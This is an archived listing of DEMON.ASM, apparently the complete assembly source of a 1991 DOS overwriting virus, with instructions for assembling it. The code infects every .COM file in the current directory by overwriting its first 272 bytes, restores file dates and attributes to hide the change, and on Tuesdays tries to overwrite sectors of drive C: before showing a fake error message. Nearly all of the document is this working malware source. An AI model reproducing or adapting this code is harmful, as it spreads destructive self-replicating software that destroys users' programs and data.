HPAVC

home *** CD-ROM | disk | FTP | other *** search

/ HPAVC / HPAVC CD-ROM.iso / SOURCE.ZIP / DEMON.ASM < prev next >

Wrap

Assembly Source File | 1994-10-27 | 6KB | 126 lines

;========== Demon virus ==================================== 22.09.91 ======== ; ; Assemble and link with: TASM DEMON.VIR ; TLINK DEMON /X/T ; Infect all .COM programs in current directory with: DEMON ; ; !!! NOT ON A TUESDAY !!! ; ;-------------- Constants and structures Tuesday = 2 ; INT 21h, AH=2Ah Search_Rec struc ; directory search record db 21 dup (?) ; reserved for DOS FileAttr db ? ; file attribute FileTime dw ? ; packed file time FileDate dw ? ; packed file date FileSize dd ? ; long file size FileName db 13 dup (?) ; ASCIIZ FILENAME.EXT Search_Rec ends ;-------------- Demon virus segment Virus segment assume cs:Virus,ds:Virus,es:Virus,ss:Virus org 0080h DTA Search_Rec <> ; disk transfer area org 0100h Demon: ; virus entry point Virus_Size = Virus_End - Demon ; virus size = 272 bytes mov dx,offset All_COM ; find first .COM file, mov ah,4eh ; including hidden/system mov cx,110bh int 21h nop jnc Infect ; abort if no files found jmp short Check_Day Infect: call Replicate ; overwrite first 272 bytes mov dx,offset DTA mov ah,4fh ; find next .COM file, int 21h ; go check day if none found nop ; else repeat jnc Next_File jmp short Check_Day Next_File: jmp Infect Check_Day: mov ah,2ah ; get DOS date, check day int 21h cmp al,Tuesday ; Tuesday ? je Thrash_Drive ; if yes, thrash drive C: mov ah,4ch ; else exit to DOS int 21h Thrash_Drive: mov Counter,0 ; overwrite first 160 sectors jmp Write_Sectors ; of drive C: with garbage Write_Sectors: mov al,Drive_C ; Error: doesn't work ! mov cx,160 ; AL=C:, CX=160 sectors mov dx,0 ; DX=highest sector in drive ! mov bx,0 ; DS:BX=start of PSP area int 26h ; overwrite sectors inc Counter cmp Counter,10 ; repeat 10 times je Show_Msg jne Write_Sectors Show_Msg: mov ah,09h ; show a fake error message mov dx,offset Virus_Msg ; and exit to DOS int 21h mov ah,4ch int 21h Replicate: mov dx,offset DTA.FileName ; save file attribute mov ax,4300h int 21h mov COM_Attr,cx nop xor cx,cx ; unprotect the .COM file mov ax,4301h ; in case it's read-only int 21h nop mov ax,3d02h ; open .COM file for R/W, int 21h ; abort on error nop jc Check_Day mov bx,ax ; BX = file handle mov ax,5700h int 21h ; save file date and time nop mov COM_Time,cx mov COM_Date,dx mov dx,offset Demon ; overwrite first 272 bytes mov ah,40h ; of .COM program file mov cx,Virus_Size ; with the virus code int 21h nop mov ax,5701h ; restore file date and time mov dx,COM_Date mov cx,COM_Time int 21h mov ah,3eh ; close the file int 21h nop mov dx,offset DTA.FileName ; restore file attribute mov cx,COM_Attr mov ax,4301h int 21h retn All_COM db '*.COM',0 ; dir search specification COM_Date dw 0 ; packed .COM program date COM_Time dw 0 ; packed .COM program time COM_Attr dw 0 ; .COM program file attribute Counter db 0 ; used when thrashing drive C: Drive_C db 2 ; INT 26h C: drive number dw 0 Copyright db 'Demonhyak Viri X.X (c) by Cracker Jack 1991 (IVRL)' dw 0 Virus_Msg db 10,13,'Error eating drive C:',10,13,'$' Virus_End label byte ; virus code+data end Virus ends end Demon